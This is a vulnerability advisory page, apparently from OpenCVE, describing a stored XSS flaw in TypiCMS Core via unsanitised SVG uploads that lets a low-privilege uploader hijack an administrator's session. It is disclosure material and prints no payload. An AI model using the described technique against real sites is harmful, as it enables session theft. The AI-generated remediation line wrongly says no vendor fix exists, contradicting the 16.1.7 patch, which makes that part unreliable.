Description
TypiCMS is a multilingual content management system based on the Laravel framework. A Stored Cross-Site Scripting (XSS) vulnerability exists in the file upload module of TypiCMS prior to version 16.1.7. The application allows users with file upload permissions to upload SVG files. While there is a MIME type validation, the content of the SVG file is not sanitized. An attacker can upload a specially crafted SVG file containing malicious JavaScript code. When another user (such as an administrator) views or accesses this file through the application, the script executes in their browser, leading to a compromise of that user's session. The issue is exacerbated by a bug in the SVG parsing logic, which can cause a 500 error if the uploaded SVG does not contain a `viewBox` attribute. However, this does not mitigate the XSS vulnerability, as an attacker can easily include a valid `viewBox` attribute in their malicious payload. Version 16.1.7 of TypiCMS Core fixes the issue.
Published: 2026-02-25
Score: 6.8 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored XSS enabling session hijacking via malicious SVG uploads
Action: Patch
AI Analysis

Impact

A stored Cross‑Site Scripting flaw exists in the file upload module of TypiCMS Core before version 16.1.7. The application accepts SVG files based on MIME type alone, but does not sanitise the file contents. An attacker can craft an SVG containing JavaScript and upload it. When another user—such as an administrator—views the SVG through the CMS, the script runs in that user’s browser, allowing the attacker to hijack the session and execute arbitrary actions with the victim’s credentials.

Affected Systems

TypiCMS Core versions earlier than 16.1.7 are affected. The vulnerability is present in all releases of the TypiCMS multilingual content management system built on Laravel that still ship the unfixed file‑upload handler. The only fix is the patch released in version 16.1.7.

Risk and Exploitability

The CVSS score of 6.8 indicates a moderate‑to‑high risk, and the very low EPSS (<1%) suggests limited real‑world exploitation at this time. The vulnerability is not listed in CISA’s KEV catalog. The flaw requires an attacker to have permission to upload files; once an SVG is uploaded, any privileged user who subsequently opens or downloads the file will have their session compromised. The bug in SVG parsing that can trigger a 500 error is not relevant to the XSS exploit because a properly formed malicious SVG can include the required viewBox attribute or omit it safely.

Generated by OpenCVE AI on April 18, 2026 at 10:49 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade TypiCMS Core to version 16.1.7 or later to apply the vendor fix that sanitises SVG uploads.
  • Restrict or disable file upload capabilities for non‑administrative accounts, ensuring only trusted users can upload SVG files.
  • Implement server‑side MIME and content validation for JPEG/PNG/SVG uploads, and consider stripping or sanitising SVG store data to remove executable scripts before storage.

Generated by OpenCVE AI on April 18, 2026 at 10:49 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-xfvg-8v67-j7wp TypiCMS Core has Stored Cross-Site Scripting (XSS) via SVG File Upload
History

Sat, 28 Feb 2026 04:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 27 Feb 2026 19:15:00 +0000

Type Values Removed Values Added
First Time appeared Typicms typicms
CPEs cpe:2.3:a:typicms:typicms:*:*:*:*:*:*:*:*
Vendors & Products Typicms typicms
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

Wed, 25 Feb 2026 12:00:00 +0000

Type Values Removed Values Added
First Time appeared Typicms
Typicms core
Vendors & Products Typicms
Typicms core

Wed, 25 Feb 2026 03:15:00 +0000

Type Values Removed Values Added
Description TypiCMS is a multilingual content management system based on the Laravel framework. A Stored Cross-Site Scripting (XSS) vulnerability exists in the file upload module of TypiCMS prior to version 16.1.7. The application allows users with file upload permissions to upload SVG files. While there is a MIME type validation, the content of the SVG file is not sanitized. An attacker can upload a specially crafted SVG file containing malicious JavaScript code. When another user (such as an administrator) views or accesses this file through the application, the script executes in their browser, leading to a compromise of that user's session. The issue is exacerbated by a bug in the SVG parsing logic, which can cause a 500 error if the uploaded SVG does not contain a `viewBox` attribute. However, this does not mitigate the XSS vulnerability, as an attacker can easily include a valid `viewBox` attribute in their malicious payload. Version 16.1.7 of TypiCMS Core fixes the issue.
Title TypiCMS Core has Stored Cross-Site Scripting (XSS) via SVG File Upload
Weaknesses CWE-79
References
Metrics cvssV4_0

{'score': 6.8, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N'}

Subscriptions

Typicms Core Typicms
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-02-26T20:59:12.644Z

Reserved: 2026-02-20T22:02:30.026Z

Link: CVE-2026-27621

cve-icon Vulnrichment

Updated: 2026-02-26T20:59:08.842Z

cve-icon NVD

Status : Analyzed

Published: 2026-02-25T03:16:06.173

Modified: 2026-06-17T10:27:24.260

Link: CVE-2026-27621

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-18T11:00:05Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')